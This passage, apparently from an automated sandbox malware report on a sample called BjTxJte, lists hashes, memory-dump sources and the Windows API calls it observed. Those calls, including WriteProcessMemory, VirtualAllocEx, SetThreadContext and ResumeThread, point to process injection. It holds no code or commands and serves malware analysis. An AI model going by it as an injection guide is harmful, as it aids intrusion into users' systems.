                                  • Opcode ID: ad084fa43c13759b2762cd15002d7b22158744d9c0570535375465b2771a5792
                                  • Instruction ID: 1664869296ba7443fb3a6ad3bea12231223a0106e64934387b713a53d656e900
                                  • Opcode Fuzzy Hash: ad084fa43c13759b2762cd15002d7b22158744d9c0570535375465b2771a5792
                                  • Instruction Fuzzy Hash: 3B41F2B1D00719CFDB25CFA9C884BDEBBB1BF49304F20806AD408AB265DB756946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 0b56a665e5e1f5fff0baca7f5c3b1a6d14d0f6e9ea8d885f57e59873e25fea45
                                  • Instruction ID: c8d3c242fa2fdd446ea6158f04c9457d964e632bd1734c734ea64d79942927e4
                                  • Opcode Fuzzy Hash: 0b56a665e5e1f5fff0baca7f5c3b1a6d14d0f6e9ea8d885f57e59873e25fea45
                                  • Instruction Fuzzy Hash: F141F0B1C0071DCBDB25DFA9C884BCEBBB5BF49304F60806AD408AB265DB756946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 099CD0B8
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 36670ebfe4ac21b262dbee7b4ae6973aac703bfc1aecf1b353776f7b242ca28b
                                  • Instruction ID: 7d30afbb0d9e9a6cffd544c9153c7007094c1dd5ec14e9d9cd13384ecd3fec4d
                                  • Opcode Fuzzy Hash: 36670ebfe4ac21b262dbee7b4ae6973aac703bfc1aecf1b353776f7b242ca28b
                                  • Instruction Fuzzy Hash: 772113B19003099FDB10DFA9C985BEEBBF5FF88310F10842AE959A7250D7789945CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 099CD0B8
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 50e8a6d26580a963149268fe3ae0118475e0b3e7cfca83e82e6d0712e3a4c520
                                  • Instruction ID: b23992b704fb178c75960f4c02ad71e93afce423e358fb4302ce474b35393233
                                  • Opcode Fuzzy Hash: 50e8a6d26580a963149268fe3ae0118475e0b3e7cfca83e82e6d0712e3a4c520
                                  • Instruction Fuzzy Hash: 6C2136B19003099FCB10DFAEC985BEEBBF5FF48310F10842AE959A7240C7789945CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 099CCF0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ffac341f9b84e09b6e404f88738a5e85786dfacb46c713c14f41f69145af95ce
                                  • Instruction ID: 84772c9c2dd9f0a159411991862dff89d1b2c2548b1d782350b04c6f34f7724a
                                  • Opcode Fuzzy Hash: ffac341f9b84e09b6e404f88738a5e85786dfacb46c713c14f41f69145af95ce
                                  • Instruction Fuzzy Hash: C32125B1D002098FDB10DFAAC8857EEBBF4EF88314F10882ED459A7240D7789945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 099CD198
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 0769f952ffd5dd22a627feed75324e2c366067acad3311a417d7ecf42467cfbd
                                  • Instruction ID: 302a7c7462a87285a12cd91bf67dc75506a0b0a97977ad2c7765a78c59a582a5
                                  • Opcode Fuzzy Hash: 0769f952ffd5dd22a627feed75324e2c366067acad3311a417d7ecf42467cfbd
                                  • Instruction Fuzzy Hash: F52116B1D002499FDB14DFAAC981AEEBBF5FF48310F50842AE959A7250C7389945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 099CCF0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 405b3f328a7df480e6685eb2527b9404695afc6459766819b803079f9f762fed
                                  • Instruction ID: 01388f66223fc749eb25c3749cdaac38aac035c7a2de4b42d6a7074cd91b22af
                                  • Opcode Fuzzy Hash: 405b3f328a7df480e6685eb2527b9404695afc6459766819b803079f9f762fed
                                  • Instruction Fuzzy Hash: 962135B19003098FDB10DFAAC8857AEBFF4EF48324F50842ED559A7240DB78A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 099CD198
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: f2b0a26329f333d1883851465383914a97dcf33a8589192dbeaf35b6e8a40de1
                                  • Instruction ID: 93aa7e9cc530c058456a1fa0b6253180da54a608f37cfeda8071de3025b9ccdc
                                  • Opcode Fuzzy Hash: f2b0a26329f333d1883851465383914a97dcf33a8589192dbeaf35b6e8a40de1
                                  • Instruction Fuzzy Hash: 142137B1C003499FDB10DFAAC980AEEFBF5FF48310F50842AE919A7250C7389944CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149DAC7
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 51a7f79e5e7c7359e38e9db57216edb41aac828d6b81092cf20e787c2cc47238
                                  • Instruction ID: 85f43343388abe618b51e83c7b5463ecdd223d7557b93f2aa3214d82f973db81
                                  • Opcode Fuzzy Hash: 51a7f79e5e7c7359e38e9db57216edb41aac828d6b81092cf20e787c2cc47238
                                  • Instruction Fuzzy Hash: 3321C4B5D002489FDB10CFAAD584ADEBFF9FB48310F14841AE918A3350D378A954CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149B841,00000800,00000000,00000000), ref: 0149BA52
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 75b26108a5b76efbb822f7fb6f99fd4292579eecf2b5f656c570991ce3058c97
                                  • Instruction ID: 17b82b66cbe2dbb2fcb4df2298f53d13c9f4a6921a2162aac52df547f06d0cc4
                                  • Opcode Fuzzy Hash: 75b26108a5b76efbb822f7fb6f99fd4292579eecf2b5f656c570991ce3058c97
                                  • Instruction Fuzzy Hash: D611E4B69003499FDB10DF9AD444ADEFFF5EB48310F10842AE919A7210C379A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099CCFD6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f691cc9ed9303238e5eb93580fc370bf8803eb0794c237c839e4d4959e9a6bb6
                                  • Instruction ID: e527bd59a58d714e4416eb6d18595cf2a1a4aea25a618a5841d73d71dc26b095
                                  • Opcode Fuzzy Hash: f691cc9ed9303238e5eb93580fc370bf8803eb0794c237c839e4d4959e9a6bb6
                                  • Instruction Fuzzy Hash: 5E112971D002499FDB10DFA9C845AEEBFF5FF88310F10881AE559A7250C7799541CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099CCFD6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: b8755de52710dd7b39606e3451d146d9b47a4a1913df7350a2278eb3e5bc09ab
                                  • Instruction ID: db4b24745fef6177c6499041d5b91f1906a75f8e23925b6a947ff67e2ea87b85
                                  • Opcode Fuzzy Hash: b8755de52710dd7b39606e3451d146d9b47a4a1913df7350a2278eb3e5bc09ab
                                  • Instruction Fuzzy Hash: F41149B18002499FDB10DFAAC844AEFBFF5FF48320F108819E559A7250C779A540CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149B841,00000800,00000000,00000000), ref: 0149BA52
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 69da1d93cedfbf1acc1e911584ee3c9116d228e472fbab5493476e5598eb0ccf
                                  • Instruction ID: dfec2e1bce0a76acd1a924951eaf370b007c41cef92d1caa623bab81f316759e
                                  • Opcode Fuzzy Hash: 69da1d93cedfbf1acc1e911584ee3c9116d228e472fbab5493476e5598eb0ccf
                                  • Instruction Fuzzy Hash: F111EFB6D002098FDB10CF9AD544ADEFBF5EF48321F14842AD919B7610C379A545CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 79fc51754fdfec3575f96e17034e3d90dfc649eb1e75dc3b60a71f3dd292eb9d
                                  • Instruction ID: d6eea4967987fa5b2f72fdf23457ac278c3da61f2a9576586eb4ed9f2d0a2b3e
                                  • Opcode Fuzzy Hash: 79fc51754fdfec3575f96e17034e3d90dfc649eb1e75dc3b60a71f3dd292eb9d
                                  • Instruction Fuzzy Hash: BE1146B1D002488FDB20DFAAC8457EEBBF5EF98310F20881AD559A7250C778A944CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 289c626abf7dd1e497c5a721f72ff25d6254c0042fdcab26bb760e519dedff23
                                  • Instruction ID: bcb60a288b28079ddf46e62d7e22fef13c0753eb456aa449297cb6eb7009f525
                                  • Opcode Fuzzy Hash: 289c626abf7dd1e497c5a721f72ff25d6254c0042fdcab26bb760e519dedff23
                                  • Instruction Fuzzy Hash: A41128B19003488FDB20DFAAC8457AEFBF5EF99320F108819D559A7240CB79A944CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0149B7C6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: ecff3f8a2489468614aea86e7acee5f8822ceefd0bab2166315a0ab99784cf80
                                  • Instruction ID: a61adb294ab2fbca8a760a3bd6f50a39527372d8e1b475c1956c0bb9d7634e57
                                  • Opcode Fuzzy Hash: ecff3f8a2489468614aea86e7acee5f8822ceefd0bab2166315a0ab99784cf80
                                  • Instruction Fuzzy Hash: C5110CB6C002498FDB10DF9AD444A9EFBF8EF89220F14856AD928B7610C379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D8B131D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2236691515.000000000D8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_d8b0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ca7547448586fea0f20f5125fbcea3b15020695127110c6b5dab87ed96e4df49
                                  • Instruction ID: b8feac5e2b289e62f8515091d61f46f14b66a244a3df7d39aafd769b89b1799e
                                  • Opcode Fuzzy Hash: ca7547448586fea0f20f5125fbcea3b15020695127110c6b5dab87ed96e4df49
                                  • Instruction Fuzzy Hash: 1511E3B58003489FDB10DF99D485BEEBBF8FB58320F20841AE559A7610D379A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D8B131D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2236691515.000000000D8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_d8b0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: fa28e89bb777c94a319c27272861100df34a355867a347880be0b22d9bef05cc
                                  • Instruction ID: 14ecc1a82287ad8293ff890485baa8d9f4e865922c469f16f1d3b3bfd6b09cd0
                                  • Opcode Fuzzy Hash: fa28e89bb777c94a319c27272861100df34a355867a347880be0b22d9bef05cc
                                  • Instruction Fuzzy Hash: EC1103B58003489FDB10DF9AD448BDEFBF8FB48320F108419E558A7600C379A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c56f4e484975b8a962840e2ba08a0fbe65e14f5e1c99078ebba9fd646fc4c29
                                  • Instruction ID: 3a7fc920320d76bc78d4a7af87a54371cca9f7cf7fcf11576796da5c4a997276
                                  • Opcode Fuzzy Hash: 0c56f4e484975b8a962840e2ba08a0fbe65e14f5e1c99078ebba9fd646fc4c29
                                  • Instruction Fuzzy Hash: 4F214871100204DFDB05DF58D9C8F56BF69FB88318F20C16DDA091B256C73AE406C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9eab67417d4767dc34d26c45f9cdfaaa7f4f4dbf755e5ce5744a8ddc2b11ebed
                                  • Instruction ID: 6270645355bb121046141aad4f3554589ba935fbe757ba5ea8e256c12cc070eb
                                  • Opcode Fuzzy Hash: 9eab67417d4767dc34d26c45f9cdfaaa7f4f4dbf755e5ce5744a8ddc2b11ebed
                                  • Instruction Fuzzy Hash: 3B210371500244DFDB05DF98D9C8F26BF69FB8831CF20C56DEA090B256C33AD416CAA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 706a051b5dc0dba4da9c5cfc93b425a125c30a40085d8bda43320567ff08a2c6
                                  • Instruction ID: 6e955a4f88176b5e1ea488323754f545a445d23ff48ad7956443dbf25d8d892f
                                  • Opcode Fuzzy Hash: 706a051b5dc0dba4da9c5cfc93b425a125c30a40085d8bda43320567ff08a2c6
                                  • Instruction Fuzzy Hash: FB21D671904204DFDB06DF99D580B26BB65FB84324F20C57ED9094B3A6C33AD40ACA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38baafe0930b62e925664c72d48c2c3981ce564c87f0e585977b2e44f77bb56b
                                  • Instruction ID: b568877dbd677e003fc180ebe9cb0770ebd2ecaa3315fcb21183cfb0d6a8a5a8
                                  • Opcode Fuzzy Hash: 38baafe0930b62e925664c72d48c2c3981ce564c87f0e585977b2e44f77bb56b
                                  • Instruction Fuzzy Hash: EE2106B1904200DFDB16DFA8D980B16BF65EB84318F20C57AD90D4B3A6C33AD40BCA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a66646bd057be263d6adb21d13868b2727576b4a25597b89521cc721bef1daf8
                                  • Instruction ID: e81026f452ada94532945bdfacb700d21249b52228d27b02827ca690c98bad1c
                                  • Opcode Fuzzy Hash: a66646bd057be263d6adb21d13868b2727576b4a25597b89521cc721bef1daf8
                                  • Instruction Fuzzy Hash: 402192755093808FDB03CF64D994716BF71EB46214F28C5EBD8498F6A7C33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 1f09f92946792221ed4251fe2a22984fe9be958d21956febcfcda8ae22348654
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: 5E11DF72404280CFCB02CF54D5C8B16BF71FB88318F24C6ADD9490B256C336D45ADBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 7239309409ab5a2758b9eb6712a65aa577bcd53aede761f3ad0516c1b8da541c
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: E411CD72404240CFDB02CF44D5C4B56BF61FB84224F24C6A9DA090A656C33AE45ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 513c7446042d04eb2e8f5ac99a825e1fae1cd20736e8d1677adcac34cfb01d98
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 3E11BE75904240DFDB02CF98C5C4B16BF61FB84224F24C6AED8494B7A6C33AD40ACB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64419e0b0af577ae63d5636b123bcf466383a932bdf23a18d09e643f0c19fc19
                                  • Instruction ID: 85813c2b4424df87797fdd5beae67337a7c68b26f7881a6eaf10ae3b97b8a192
                                  • Opcode Fuzzy Hash: 64419e0b0af577ae63d5636b123bcf466383a932bdf23a18d09e643f0c19fc19
                                  • Instruction Fuzzy Hash: 27012B310043849AE7219F99CD88B67BF9CEF45328F18C52EEF090E297C2399805CA71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07e5c14d1ff73eaf9f56895ede8baf684761ad35fdac66da282ecd8a0726de9d
                                  • Instruction ID: 3ff9634df26b8fefc2262882ba27ce7371ad3c04896884480997f59405475b20
                                  • Opcode Fuzzy Hash: 07e5c14d1ff73eaf9f56895ede8baf684761ad35fdac66da282ecd8a0726de9d
                                  • Instruction Fuzzy Hash: 66F062714043849EE7119E1AC888B62FF98EF95634F18C45AEE484E297C2799845CAB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:24
                                  Total number of Limit Nodes:6

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 4956c85a5527b8b0f89c214b2a3bd3089dfcbe5dc56f881b56f67405c138c744
                                  • Instruction ID: 8eb82619f281f8e34a9f96f1ed6bf673a7727b6124e77768c5ee5a22f609022c
                                  • Opcode Fuzzy Hash: 4956c85a5527b8b0f89c214b2a3bd3089dfcbe5dc56f881b56f67405c138c744
                                  • Instruction Fuzzy Hash: 0D323F31E1065A8FDB14EF65D89069DF7B2FF89300F20C669D409AB664EB30AD85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 36a3ad5b805e62391b3f47a1b33eef4392d5b8700e87f221a5b0e3aa1cf81287
                                  • Instruction ID: dd31fe0674ffe797cde079028b45dc5dbaee11b219c45e90e75b792dd8aa50ff
                                  • Opcode Fuzzy Hash: 36a3ad5b805e62391b3f47a1b33eef4392d5b8700e87f221a5b0e3aa1cf81287
                                  • Instruction Fuzzy Hash: 0502B030F002058FDB54EB69E690AAEBBB2FF84350F148529E415EB795DB35EC42CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-3993045852
                                  • Opcode ID: 549d5573c33285ee3446106939a164b31d0e32cb42b2e9f872d722a066e5397a
                                  • Instruction ID: 721d8ed374d8852ecf4b6a50bef687876afea98610e0a6efb776086126a791df
                                  • Opcode Fuzzy Hash: 549d5573c33285ee3446106939a164b31d0e32cb42b2e9f872d722a066e5397a
                                  • Instruction Fuzzy Hash: 1322DF71E002199FDF60FBA4C5806AEBBB2FF89320F20856AD515AB794DB35DC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d584586b4bdac84ae7504c08b2cb86fe69f4e1e835a5604086580c67832d0512
                                  • Instruction ID: 9b92c3cdb87725e37cdcded9ba66f14430ce612b9f7bf5f1154622c8809bcb17
                                  • Opcode Fuzzy Hash: d584586b4bdac84ae7504c08b2cb86fe69f4e1e835a5604086580c67832d0512
